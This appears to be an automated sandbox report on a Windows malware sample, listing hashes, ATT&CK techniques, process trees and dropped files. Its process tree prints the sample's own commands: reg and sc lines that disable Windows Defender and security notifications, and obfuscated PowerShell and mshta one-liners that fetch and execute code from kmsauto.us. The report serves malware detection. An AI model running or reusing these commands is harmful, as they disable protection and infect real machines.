2181fc561eed3985e3f6922bfc50bb1a761377874ab0e86344bdc74505ed8f5c

General

Target

006b91eb_IHyB_31ECD.exe
Size

1010KB
MD5

006b91eb6fe52d68af0c7e6b6ee0cdf5
SHA1

a797f0062757264d9ed96fb16dbbe1f997891cb4
SHA256

2181fc561eed3985e3f6922bfc50bb1a761377874ab0e86344bdc74505ed8f5c
SHA512

3318ae6b954591db13537c8c04630a9914cdd51bfd4ef7c372f7bfb2cd33f572d06041ed99b97ed44796a3654891e444598ab15a102d86efa7ae9a80afccc634

Score

10^/10

evasion suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://kmsauto.us/ALL.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://kmsauto.us/ra/ALL.txt

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
suricata: ET MALWARE PE EXE or DLL Windows file download Text
suricata: ET MALWARE PE EXE or DLL Windows file download Text
suricata
Blocklisted process makes network request 6 IoCs

Processes:

mshta.exemshta.exepowershell.exepowershell.exe

flow pid process

34 1908 mshta.exe
35 3544 mshta.exe
36 3568 powershell.exe
37 4000 powershell.exe
43 4000 powershell.exe
44 4000 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

AZfzxQH4.comThud6vUm.comHJRNsXOY.com

pid process

388 AZfzxQH4.com
2760 Thud6vUm.com
1308 HJRNsXOY.com
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

792 3568 WerFault.exe powershell.exe
752 4000 WerFault.exe powershell.exe

flow	pid	process
34	1908	mshta.exe
35	3544	mshta.exe
36	3568	powershell.exe
37	4000	powershell.exe
43	4000	powershell.exe
44	4000	powershell.exe

pid	process
388	AZfzxQH4.com
2760	Thud6vUm.com
1308	HJRNsXOY.com

pid	pid_target	process	target process
792	3568	WerFault.exe	powershell.exe
752	4000	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

Processes:

powershell.exepowershell.exeWerFault.exeWerFault.exe

pid	process
4000	powershell.exe
3568	powershell.exe
4000	powershell.exe
3568	powershell.exe
3568	powershell.exe
4000	powershell.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
792	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe
752	WerFault.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exeWerFault.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeDebugPrivilege	792	WerFault.exe
Token: SeDebugPrivilege	752	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

006b91eb_IHyB_31ECD.exeThud6vUm.comHJRNsXOY.comAZfzxQH4.comcmd.execmd.exe

description	pid	process	target process
PID 564 wrote to memory of 388	564	006b91eb_IHyB_31ECD.exe	AZfzxQH4.com
PID 564 wrote to memory of 388	564	006b91eb_IHyB_31ECD.exe	AZfzxQH4.com
PID 564 wrote to memory of 388	564	006b91eb_IHyB_31ECD.exe	AZfzxQH4.com
PID 564 wrote to memory of 2760	564	006b91eb_IHyB_31ECD.exe	Thud6vUm.com
PID 564 wrote to memory of 2760	564	006b91eb_IHyB_31ECD.exe	Thud6vUm.com
PID 2760 wrote to memory of 1908	2760	Thud6vUm.com	mshta.exe
PID 2760 wrote to memory of 1908	2760	Thud6vUm.com	mshta.exe
PID 564 wrote to memory of 1308	564	006b91eb_IHyB_31ECD.exe	HJRNsXOY.com
PID 564 wrote to memory of 1308	564	006b91eb_IHyB_31ECD.exe	HJRNsXOY.com
PID 1308 wrote to memory of 3544	1308	HJRNsXOY.com	mshta.exe
PID 1308 wrote to memory of 3544	1308	HJRNsXOY.com	mshta.exe
PID 388 wrote to memory of 988	388	AZfzxQH4.com	cmd.exe
PID 388 wrote to memory of 988	388	AZfzxQH4.com	cmd.exe
PID 988 wrote to memory of 2172	988	cmd.exe	sc.exe
PID 988 wrote to memory of 2172	988	cmd.exe	sc.exe
PID 988 wrote to memory of 2288	988	cmd.exe	sc.exe
PID 988 wrote to memory of 2288	988	cmd.exe	sc.exe
PID 988 wrote to memory of 1596	988	cmd.exe	sc.exe
PID 988 wrote to memory of 1596	988	cmd.exe	sc.exe
PID 988 wrote to memory of 2120	988	cmd.exe	sc.exe
PID 988 wrote to memory of 2120	988	cmd.exe	sc.exe
PID 988 wrote to memory of 3856	988	cmd.exe	sc.exe
PID 988 wrote to memory of 3856	988	cmd.exe	sc.exe
PID 988 wrote to memory of 3852	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3852	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3928	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3928	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3904	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3904	988	cmd.exe	reg.exe
PID 988 wrote to memory of 4040	988	cmd.exe	reg.exe
PID 988 wrote to memory of 4040	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3208	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3208	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3736	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3736	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3260	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3260	988	cmd.exe	reg.exe
PID 988 wrote to memory of 920	988	cmd.exe	reg.exe
PID 988 wrote to memory of 920	988	cmd.exe	reg.exe
PID 988 wrote to memory of 196	988	cmd.exe	reg.exe
PID 988 wrote to memory of 196	988	cmd.exe	reg.exe
PID 988 wrote to memory of 1980	988	cmd.exe	reg.exe
PID 988 wrote to memory of 1980	988	cmd.exe	reg.exe
PID 988 wrote to memory of 2768	988	cmd.exe	reg.exe
PID 988 wrote to memory of 2768	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3600	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3600	988	cmd.exe	reg.exe
PID 988 wrote to memory of 2832	988	cmd.exe	reg.exe
PID 988 wrote to memory of 2832	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3604	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3604	988	cmd.exe	reg.exe
PID 988 wrote to memory of 1304	988	cmd.exe	reg.exe
PID 988 wrote to memory of 1304	988	cmd.exe	reg.exe
PID 988 wrote to memory of 2252	988	cmd.exe	reg.exe
PID 988 wrote to memory of 2252	988	cmd.exe	reg.exe
PID 988 wrote to memory of 1596	988	cmd.exe	cmd.exe
PID 988 wrote to memory of 1596	988	cmd.exe	cmd.exe
PID 1596 wrote to memory of 2120	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 2120	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 3912	1596	cmd.exe	find.exe
PID 1596 wrote to memory of 3912	1596	cmd.exe	find.exe
PID 988 wrote to memory of 3900	988	cmd.exe	reg.exe
PID 988 wrote to memory of 3900	988	cmd.exe	reg.exe
PID 988 wrote to memory of 2664	988	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\006b91eb_IHyB_31ECD.exe
"C:\Users\Admin\AppData\Local\Temp\006b91eb_IHyB_31ECD.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:564

C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com
"C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:388

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CBA2.tmp\CBA3.tmp\CBA4.bat C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com"
3⤵
- Suspicious use of WriteProcessMemory
PID:988

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
4⤵
PID:2172

C:\Windows\system32\sc.exe
sc config SecurityHealthService start=disabled
4⤵
PID:2288

C:\Windows\system32\sc.exe
sc config Sense start=disabled
4⤵
PID:1596

C:\Windows\system32\sc.exe
sc config WdNisDrv start=disabled
4⤵
PID:2120

C:\Windows\system32\sc.exe
sc config WdNisSvc start=disabled
4⤵
PID:3856

C:\Windows\system32\reg.exe
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:3852

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:3928

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:3904

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:4040

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:3208

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
4⤵
PID:3736

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
4⤵
PID:3260

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:920

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:196

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
PID:1980

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
PID:2768

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
PID:3600

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:2832

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
4⤵
PID:3604

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:1304

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:2252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"
4⤵
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"
5⤵
PID:2120

C:\Windows\system32\find.exe
find /i "SecHealthUI"
5⤵
PID:3912

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
4⤵
PID:3900

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-1594587808-2047097707-2163810515-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
4⤵
PID:2664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
4⤵
PID:728

C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
5⤵
PID:2764

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f
4⤵
PID:3252

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f
4⤵
PID:2300

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
4⤵
PID:2364

C:\Users\Admin\AppData\Local\Temp\Thud6vUm.com
"C:\Users\Admin\AppData\Local\Temp\Thud6vUm.com"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2760

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
3⤵
- Blocklisted process makes network request
PID:1908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4000

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4000 -s 2464
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.com
"C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.com"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1308

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt
3⤵
- Blocklisted process makes network request
PID:3544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3568 -s 2532
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Disabling Security Tools

1

T1089

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com
MD5
1f460870b7a0a5979925cef15b0ca8ee

SHA1
4c5ac8f5ead53e0ba504c20c238e8f9fb3e435e6

SHA256
7f1db23c8550c2baf0fc007b2ebf7532ceacb3e8f38d8edfb29b250c6fed5273

SHA512
909826c719b23b4efd37fb53b0700394c398ff8da75f46833c70db16081121d22fd573c4133723f45c71f0b377ad458764140484329f07360a643263ac0ff2c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com
MD5
1f460870b7a0a5979925cef15b0ca8ee

SHA1
4c5ac8f5ead53e0ba504c20c238e8f9fb3e435e6

SHA256
7f1db23c8550c2baf0fc007b2ebf7532ceacb3e8f38d8edfb29b250c6fed5273

SHA512
909826c719b23b4efd37fb53b0700394c398ff8da75f46833c70db16081121d22fd573c4133723f45c71f0b377ad458764140484329f07360a643263ac0ff2c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\CBA2.tmp\CBA3.tmp\CBA4.bat
MD5
4daac34f17ecb3f09ce92bf60d62144a

SHA1
73898316bf67ab815528d4996e7f04185297baa8

SHA256
3f4f8c7e86bcc0432e2835771ae63fbc2b226be760c3190a96dcbe453cbbcb9d

SHA512
09f5fc715324dae244c229673cc2a86e93ade56ecd841c1b430389322b6e6d259debd852cb1d6b260c2a27aa2086f16d16ca9be81b1ac69ecbb0ea1c399a0bd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.com
MD5
b48dea0c642487df2482ab8fa55bb923

SHA1
50b00f687892a656319aefcecba535459e2d8a2d

SHA256
0dfe7a93ff40834c072c7fdd9381771b1086b67f545fa83c766b2d67a911e47b

SHA512
2b57678d9817fbc42c5d2f9e8b2cf0ff12b67882cc18e624422857be950810a4ea63c857700d7cf5a91ea66ed6a5074a3bfab6eff883c66457db8c611bde6e16

Download Submit
C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.com
MD5
b48dea0c642487df2482ab8fa55bb923

SHA1
50b00f687892a656319aefcecba535459e2d8a2d

SHA256
0dfe7a93ff40834c072c7fdd9381771b1086b67f545fa83c766b2d67a911e47b

SHA512
2b57678d9817fbc42c5d2f9e8b2cf0ff12b67882cc18e624422857be950810a4ea63c857700d7cf5a91ea66ed6a5074a3bfab6eff883c66457db8c611bde6e16

Download Submit
C:\Users\Admin\AppData\Local\Temp\Thud6vUm.com
MD5
d38aea02881ff45b60e6b2c11cd44916

SHA1
ab4d6992c292931c297ca55d3d2ee34df64b7f7b

SHA256
aa7ff8badcffdff66df6d30bde51b6e3c960be0a3719b73d3875af8e1173bd94

SHA512
c42fc67b08e130e2ea188328c7dbb69be6ae8c575cb79301117bbc22c4b292c59e0f186e25443e394fa36b34122c347c32e85d73716949812c3798880071ee7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Thud6vUm.com
MD5
d38aea02881ff45b60e6b2c11cd44916

SHA1
ab4d6992c292931c297ca55d3d2ee34df64b7f7b

SHA256
aa7ff8badcffdff66df6d30bde51b6e3c960be0a3719b73d3875af8e1173bd94

SHA512
c42fc67b08e130e2ea188328c7dbb69be6ae8c575cb79301117bbc22c4b292c59e0f186e25443e394fa36b34122c347c32e85d73716949812c3798880071ee7f

Download Submit
C:\Users\Public\ Microsoft.ps1
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/196-146-0x0000000000000000-mapping.dmp

Download
memory/388-114-0x0000000000000000-mapping.dmp

Download
memory/728-159-0x0000000000000000-mapping.dmp

Download
memory/920-145-0x0000000000000000-mapping.dmp

Download
memory/988-131-0x0000000000000000-mapping.dmp

Download
memory/1304-152-0x0000000000000000-mapping.dmp

Download
memory/1308-126-0x0000000000F80000-0x0000000000F81000-memory.dmp

Filesize
4KB

Download
memory/1308-123-0x0000000000000000-mapping.dmp

Download
memory/1596-154-0x0000000000000000-mapping.dmp

Download
memory/1596-135-0x0000000000000000-mapping.dmp

Download
memory/1908-122-0x0000000000000000-mapping.dmp

Download
memory/1980-147-0x0000000000000000-mapping.dmp

Download
memory/2120-136-0x0000000000000000-mapping.dmp

Download
memory/2120-155-0x0000000000000000-mapping.dmp

Download
memory/2172-133-0x0000000000000000-mapping.dmp

Download
memory/2252-153-0x0000000000000000-mapping.dmp

Download
memory/2288-134-0x0000000000000000-mapping.dmp

Download
memory/2300-162-0x0000000000000000-mapping.dmp

Download
memory/2364-163-0x0000000000000000-mapping.dmp

Download
memory/2664-158-0x0000000000000000-mapping.dmp

Download
memory/2760-120-0x00000000004B0000-0x00000000004B1000-memory.dmp

Filesize
4KB

Download
memory/2760-117-0x0000000000000000-mapping.dmp

Download
memory/2764-160-0x0000000000000000-mapping.dmp

Download
memory/2768-148-0x0000000000000000-mapping.dmp

Download
memory/2832-150-0x0000000000000000-mapping.dmp

Download
memory/3208-142-0x0000000000000000-mapping.dmp

Download
memory/3252-161-0x0000000000000000-mapping.dmp

Download
memory/3260-144-0x0000000000000000-mapping.dmp

Download
memory/3544-128-0x0000000000000000-mapping.dmp

Download
memory/3568-186-0x000002912F5E3000-0x000002912F5E5000-memory.dmp

Filesize
8KB

Download
memory/3568-165-0x0000000000000000-mapping.dmp

Download
memory/3568-224-0x0000029130FB0000-0x0000029130FCF000-memory.dmp

Filesize
124KB

Download
memory/3568-199-0x000002912F5E6000-0x000002912F5E8000-memory.dmp

Filesize
8KB

Download
memory/3568-189-0x000002914B620000-0x000002914B621000-memory.dmp

Filesize
4KB

Download
memory/3568-184-0x000002912F5E0000-0x000002912F5E2000-memory.dmp

Filesize
8KB

Download
memory/3600-149-0x0000000000000000-mapping.dmp

Download
memory/3604-151-0x0000000000000000-mapping.dmp

Download
memory/3736-143-0x0000000000000000-mapping.dmp

Download
memory/3852-138-0x0000000000000000-mapping.dmp

Download
memory/3856-137-0x0000000000000000-mapping.dmp

Download
memory/3900-157-0x0000000000000000-mapping.dmp

Download
memory/3904-140-0x0000000000000000-mapping.dmp

Download
memory/3912-156-0x0000000000000000-mapping.dmp

Download
memory/3928-139-0x0000000000000000-mapping.dmp

Download
memory/4000-187-0x0000023D1DFC3000-0x0000023D1DFC5000-memory.dmp

Filesize
8KB

Download
memory/4000-182-0x0000023D1DFC0000-0x0000023D1DFC2000-memory.dmp

Filesize
8KB

Download
memory/4000-176-0x0000023D385C0000-0x0000023D385C1000-memory.dmp

Filesize
4KB

Download
memory/4000-200-0x0000023D1DFC6000-0x0000023D1DFC8000-memory.dmp

Filesize
8KB

Download
memory/4000-164-0x0000000000000000-mapping.dmp

Download
memory/4040-141-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads